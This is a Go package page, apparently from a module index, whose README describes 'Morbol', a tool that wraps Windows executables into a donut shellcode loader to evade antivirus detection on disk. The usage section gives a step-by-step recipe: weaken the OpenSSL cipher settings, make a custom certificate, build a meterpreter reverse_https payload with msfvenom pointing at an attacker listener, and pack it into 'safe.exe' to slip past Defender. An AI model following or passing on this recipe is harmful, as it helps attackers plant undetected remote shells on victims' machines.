command
module
Version:
v0.0.0-...-d76c313
Opens a new window with list of versions in this module.
Published: Feb 1, 2021
License: MIT
Opens a new window with license information.
Imports: 8
Opens a new window with list of imports.
Imported by: 0
Opens a new window with list of known importers.
README
¶
Morbol
Wraps PE Files (PIE required) into a shellcode loader via donut. This mainly evades detection on disk.
Setup
pip3 install donut-shellcode
sudo apt-get install upx
Usage
In my experience the only reliable way to evade defender with meterpreter is to use a reverse_https payload with a custom cert.
- Modify
/etc/ssl/openssl.cnf
so that CipherString = DEFAULT
- openssl req -new -x509 -nodes -out cert.crt -keyout priv.key
- set HandlerSSLCert on the server side listener
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=... LPORT=... HandlerSSLCert=... -f exe > msf.exe
python3 morbol.py msf.exe safe.exe
Credit
Heavily based on:
Documentation
¶
There is no documentation for this package.
Source Files
¶
Directories
¶
Click to show internal directories.
Click to hide internal directories.